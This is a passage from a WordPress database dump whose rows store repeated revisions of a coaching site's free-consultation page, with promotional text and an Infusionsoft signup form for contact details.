(1231, 4194, '2014-07-04 15:48:39', '2014-07-04 20:48:39', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" class="btn" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:48:39', '2014-07-04 20:48:39', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1232, 4194, '2014-07-04 15:49:19', '2014-07-04 20:49:19', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" class="btn" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:49:19', '2014-07-04 20:49:19', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1233, 4194, '2014-07-04 15:50:45', '2014-07-04 20:50:45', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial 